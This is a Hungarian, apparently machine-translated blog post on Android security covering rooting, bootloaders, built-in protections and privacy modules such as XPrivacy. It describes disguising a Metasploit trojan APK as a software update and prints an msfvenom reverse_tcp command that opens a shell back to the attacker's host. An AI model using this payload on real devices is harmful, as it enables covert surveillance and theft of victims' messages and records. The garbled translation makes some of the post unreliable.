Képforrás: pixabay.com

Bevezetés az Android-ba

Ebben a témában megismerjük az Androidot és az Open Source Security (OS) rendszert. Az Android egy nyílt forráskódú platform. Nagyon hasonlít a Linuxra, de még mindig túlságosan különbözik a Linuxtól. A Linux túl érett az Android-hoz képest. Tehát ez Chetan Nayak, és üdvözlöm a következő blogomban az Open Source Web Security oldalon. Azért írtam ezt a blogot, feltételezve, hogy legtöbben Android K-t, azaz Kitkat vagy Android L, azaz a Lollipop-ot fogják használni.

Ennek oka a Mézeskalács és a Jellybean volt sok nyílt forráskódú biztonsági kérdéssel, amelyeket nem tudok megvitatni ebben az egyetlen blogban. Tehát talán legközelebb megvitatom, amikor mélyebben belemerülök az Android régebbi változataiba. Tehát, mostantól kezdve, ragaszkodjunk a KitKathoz és a Lollipophoz.

Az Android-ot a fejlesztők szem előtt tartásával fejlesztették ki. A biztonsági ellenőrzéseket úgy fejlesztették ki, hogy csökkentsék a fejlesztőkre háruló terheket. A biztonságos fejlesztésű fejlesztők könnyen együttműködhetnek a rugalmas biztonsági ellenőrzésekkel és támaszkodhatnak rájuk. A biztonsággal kevésbé ismerő fejlesztőket biztonságos alapértelmezések védik.

A kezdet

Nem voltam sokat az androidban, amíg 2013 későbbi negyedévében nem volt első Android mobiltelefonom, amely a Sony Xperia L volt (az akkori 4.2.2 alapján). Hé, még az Androidot is utáltam, mert rendkívül késő volt, különösképp a Samsung készülékeken. Még akkor is fontolóra vettem a Windows Lumia vásárlását, de szerencsére sok játékot játszottam, és Xperia L-t kellett vásárolnom, mivel ez a cella Lag Proof volt. Körülbelül 1 gigabárnyi RAM-ot és Adreno 305-et tartalmazott.

Miután sok olyan játékot játszottam, mint a NOVA3 és a ModernCombat4, egy hónapon belül unatkoztam a celláról. Tudtam, hogy az Android alapja a Linux, és ehhez a módosításokat akartam csinálni. Elolvastam a testreszabási lehetőségeket, és megtanultam, hogy mit hívnak „gyökeresedésnek”. Mivel jó háttérem volt a Linuxban, a gyökeresedés nem jelent számomra. Az XDA kis segítségével sikeresen meg tudtam gyökerezni a cellámat.

De aztán valami megütött. Amint a cellám a gyökeresedés után újraindult, csak elindult a rendszerindítás-hurok (örökre beragadt a rendszerindító képernyőre). Még azt sem tudtam, hogy milyen bootloader volt az androidban. Tehát nem tehettem semmit. Alig egy hónap telt el, amikor megvettem az új cellámat, és a cellámom most lágytégla. Mindig olvastam, hogy a gyökeresedés veszélyes, de nem tudtam, hogy tönkretenné a cellám. De tévedtem. Miközben folyamatosan olvastam a gyökereket, megtudtam, hogy a gyökeresedés nem tombolja a telefont.

A gyökérzet éppen hasonlít a számítógép adminisztrátori hozzáféréséhez (valójában ez egy rendszerhozzáférés, de az adminisztrátori hozzáférést írtam, így a noobsok számára könnyen érthető.) Ez azt jelenti, hogy a gyökeresedés soha nem fogja megtörni a telefonját. A bootloader tette fel a telefonomat. Azok számára, akik nem ismerik a rendszerbetöltőt; A bootloader hasonló a Windows BIOS-hoz. (Ha nem tudja, mi a BIOS, akkor nem szabad elolvasnia a biztonságot sem.) A Bootloader vagy a Hboot (ezt nevezik androidnak) az első dolog, ami az Android indításakor fut. eszköz.

Az operációs rendszer kernelének indítására vonatkozó utasításokat csomagolja, és többséget kifejezetten saját hibakeresési vagy módosítási környezetük futtatására tervezték.

Az Android biztonsági ellenőrző pontja

Gondolj a rendszerbetöltő eszközre, mint a készülék biztonsági ellenőrző pontjára. Ha megtöri ezt az ellenőrző pontot, akkor mindent el fog veszíteni, ami a telefonján van. Szóval, azt mondom, hogy ez egy jó biztonsági funkció. Mivel ha elveszíti a telefonját, és valaki megpróbál root hozzáférést szerezni a zárolás megkerüléséhez (feltételezve, hogy eszközét egy PIN-kóddal vagy jelszóval zárolta le), akkor kötelezően fel kell nyitnia a rendszerbetöltőt, ami az adatok törlését eredményezi. a telefonon.

Tehát nem kell aggódnia, hogy valaki visszaél. Tehát hasonló az eset az egyedi ROM-oknál. A ROM-ok olyan operációs rendszerek, amelyek kifejezetten a hardver architektúrájához tervezték az Android verziókat. Tehát, ha ellenőrzi a telefon XDA-ját, akkor n számú testreszabott ROM lesz a telefonjaihoz, ezek közül a leghíresebb a Cyanogen Mod ROM, amelyek már előre vannak gyökerezve, és előre definiált testreszabási készlettel rendelkeznek .

Az Android biztonsági felülbírálása

Most már azt gondolhatja, hogy van egy biztonságos mobiltelefonja. De azért vagyok itt, hogy ismét bebizonyítsam tévedésed, és ez a blog lényege. 2014 második negyedévére az emberek már elkezdték az Android operációs rendszereinek fejlesztését és a rootkit-ek fejlesztését, amelyek a mobiltelefonjaikat a rendszerbetöltők feloldása nélkül is meg tudják gyökéríteni.

Nem ijesztő? Hadd mondjam el neked a legveszélyesebb részt. Még a trójaikat is telepíthetnék ebbe. Tehát, még ha a zsaruk is nyomon követhetik a cellát, és még a celláját is visszakaphatják, továbbra is fennáll annak a veszélye, hogy mindent látnak, amit a telefonján csinálnak. Ezt próbáltam kísérletként gyakorlati környezetben.

A Metasploitot használtam erre a támadásra. Azt tettem, hogy létrehoztam egy trójai programot, és telepítettem a céltelefonra. Egy egyszerű apk fájl volt, és szoftverfrissítésnek neveztem el. Tehát, ha a felhasználó csak közönséges ember, csak kis és byte-os információval rendelkezik a biztonságról, akkor még csak nem is mertem eltávolítani. Gondoskodtam arról, hogy az internet aktiválásakor az általam létrehozott rosszindulatú program automatikusan végrehajtja önmagát, és visszatérjen a távoli porthoz a gazdagépen.

A következő parancsokat használták a támadáshoz (a Metasploit egy penetrációs tesztelő szoftver, amely segítséget nyújt egy platform vagy meghatározott eszköz sérülékenységének ellenőrzésében.)

Saját host IP-cím: 192.168.xx.xx

Saját host port (visszatéréshez): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Tehát itt létrehoztam egy fordított TCP csatornát a számítógépemen. Tehát minden alkalommal, amikor az internet elindul az androidon, kapok egy héjat a Kali-gépemen, vagy azon a gépen, amelybe telepítettem a Metasploit.

Tehát, most már tudja, mennyire félelmetes egy olyan személy számára, akit még csak nem is ismer, és nyilvántartása van minden olyan tranzakcióról, amelyet a cellán keresztül hajt végre, minden más kapcsolattartóról, a WhatsApp üzenetekről, az SMS-ről, a Viber-ről és a Skype hívásnaplójáról és mindenről. Ha ez nem félelmetes, akkor nem tudom, mi az.

Ajánlott tanfolyamok

  • Tanúsító tanfolyam a Ruby hibakeresésben
  • Teljes PHP MySQL tanfolyam
  • Online tanúsító tanfolyam a VB.NET programozásban
  • Online tanfolyam az ITIL Alapítványról

A lefedettség

Elég a biztonsági kérdésekről. Mindannyian tudjuk, hogy minden más platformon biztonsági problémák vannak. Hogyan lehetünk biztonságban? Ez nem igaz. A platformokat biztonságossá lehet tenni egy adott pontig, de utána rajtunk múlik, hogy megbizonyosodjunk arról, hogy így marad-e. Van egy hírhedt idézet a biztonság világában:

„Társadalomtudomány: Mert nincs javítás az emberi hülyeségért”

Ezt a mondatot régen hallottam, amikor a DefCon konferenciáját néztem.

Ha nincs műszaki sebezhetőség a kizsákmányolás érdekében, meg kell próbálnia az emberek csapkodását. És ezen keresztül nem hipnotizmust és más dolgot értem. A szociális mérnököt értem. Erről további információt a „Kiberbiztonság fontossága a mindennapi életben” című blogomban olvashatsz.

Az Android alapvető biztonsági funkciója

Ezen kívül a szociális mérnöki munka, amelyre csak akkor lehet gondoskodni, ha okos vagy; vannak módok az Android alkalmazások biztonságos fejlesztésére, hogy megbizonyosodjon arról, hogy az így marad-e.

Tehát itt van néhány alapvető biztonsági szolgáltatás, amelyek segítenek a biztonságos alkalmazások felépítésében:

  • Az Android Application Sandbox, amely elkülöníti az alkalmazás adatait és a kód végrehajtását más alkalmazásoktól.
  • Alkalmazási keret a közös biztonsági funkciók, például kriptográfia, engedélyek és biztonságos IPC robusztus megvalósításával.
  • Titkosított fájlrendszer, amely engedélyezhető az elveszett vagy ellopott eszközök adatainak védelmére.
  • A felhasználó által megadott engedélyek a rendszer funkcióinak és felhasználói adatokhoz való hozzáférés korlátozására.
  • Alkalmazás által meghatározott engedélyek az alkalmazások adatainak alkalmazásonkénti kezelésére.

Mit tehetsz, ha biztonságos környezetet akarsz, de nem fejlesztő?

Az Android 5-től, azaz a Lollipop-tól, olyan szolgáltatást nyújt, ahol a felhasználó több profilt és korlátozott módot adhat hozzá telefonok és táblagépek használatához. Ezen túlmenően, ha gyökerezi a telefonját, vannak olyan android alkalmazások az Xposed modulokban, mint például az AppOps, az Xprivacy vagy a Privacy Guard, amelyek segítenek majdnem mindent vigyázni. Ehhez telepítenie kell az Xposed Framework-t.

Az Xposed Framework lehetővé teszi az Xposed modulok működését. Az Xposed modulok lehetővé teszik az Apk és a System fájlok viselkedésének megváltoztatását anélkül, hogy másik ROM-ot kellene telepíteni. A változtatások visszavonása szintén könnyű, így itt kevés a veszély és ez még nem is időigényes, mivel nem kell több ROM-ot, kernelt és azok hibajavítását villogni.

Az Xprivacy, a Privacy Guard és az AppOps olyan exponált modulok, amelyek lehetővé teszik, hogy biztonságossá tegye androidját úgy, hogy kiválasztja, melyik alkalmazásnak kell hozzáférnie ahhoz, mint például az internet, a billentyűzet, az SDK, a root hozzáférés és még sok más. Még csak bizonyos szolgáltatásokhoz is hozzáférést tilthat le, és ehhez létrehozhat felhasználó által definiált sablonokat. Engem illetve inkább az Xprivacy-t választom. De itt van néhány információ vagy különbség, ha különbséget kér, hogy válasszon a fenti három közül.

AppOps:

Ezt eredetileg a Google vezette be az Android 4.3 rendszerben. (Ez a fő oka annak, hogy nem támogatom. Nem bízom a Google-ban. Paranoia-nak hívják, de a Google nyomon követi mindazt, amit csinálsz. És nincs szükségem valakinek, aki nyomon követi mindazt, amit csinálok, de ha bízik a Google-ban), hajrá.). Az AppOps fő korlátozása az, hogy a Google csak azoknak az alkalmazásoknak a hozzáférését akadályozhatja meg, amelyeket blokkolni szeretne.

Ez azt jelenti, ha blokkolni szeretné a Google-hoz kapcsolódó alkalmazásokat, például a Play Szolgáltatásokat (amelyek a normál memória, az akkumulátor és az adatok (internet) több mint 50% -át fogyasztják), akkor nem lesz képes. Ez egy újabb ok, amiért utálom a Google-t. Szóval úgy gondolom, hogy az AppOps számomra nem más, mint egy rosszindulatú program. (de én csak így gondolkodtam így, nem az, ha csak szívében bízol a Google-ban)

Adatvédelmi őr:

A Privacy Guard egy egyszerűen használható felület, amelyet az AppOps helyett Cyanogen Mod készített. Ha Ön kezdő, akkor azt javaslom, hogy használja ezt, mivel csak be- és kikapcsoló gombja van, és önállóan definiált sablonok tartalmazzák, hogy milyen alkalmazásokhoz mit kell hozzáférniük. Ez nem olyan biztonságos, ha van olyan rosszindulatú program, amely úgy működik vagy megszemélyesül, mint egy rendszer alkalmazás. De jó, ha elkezdi.

Xprivacy:

Az Xprivacy minden egyben eszköz. De célja a szakértők. Össze lehet hasonlítani egy svájci hadsereg késsel. Minden benne van, és a telefonját minden más módon biztonságossá teheti, de ha nem tudja, mit csinál, akkor csak összezavarja a telefont, és megakadályozza az alkalmazások indítását. Ezenkívül korlátozhatja a hozzáférést a System Apps-hoz. Ez az, amit én személy szerint szívesebben választottam.

A fenti modulokon kívül vannak még olyan modulok is, mint például a Világító tűzfal vagy a BootManager az Xposed-ben, amelyek elősegíthetik az egyes alkalmazások internethozzáférésének korlátozását, és megakadályozhatják az alkalmazásokat, hogy a telefon újraindításakor a rendszer mellett induljanak.

Szóval erről lenne erről a blogról. Biztonsági aggályok esetén minden bizonnyal meglátogathatja vagy tagja lehet az XDA webhelynek, amely sokkal több információt nyújthat az adatvédelemről.

Ajánlott cikkek: -

Ez egy útmutató az Android számára. Itt megvitattuk az Android alapvető koncepcióját, biztonsági ellenőrző pontjait és az alapvető biztonsági funkciót. A további javasolt cikkeken keresztül további információkat is megtudhat -

  1. Android interjúkérdések - a 10 legfontosabb hasznos kérdés
  2. 8 Hasznos Siri-alternatíva Androidra
  3. 28 legjobb tipp és trükk az Android Apps fejlesztőeszközökhöz
  4. Karrier az Android fejlesztésben

Kategória: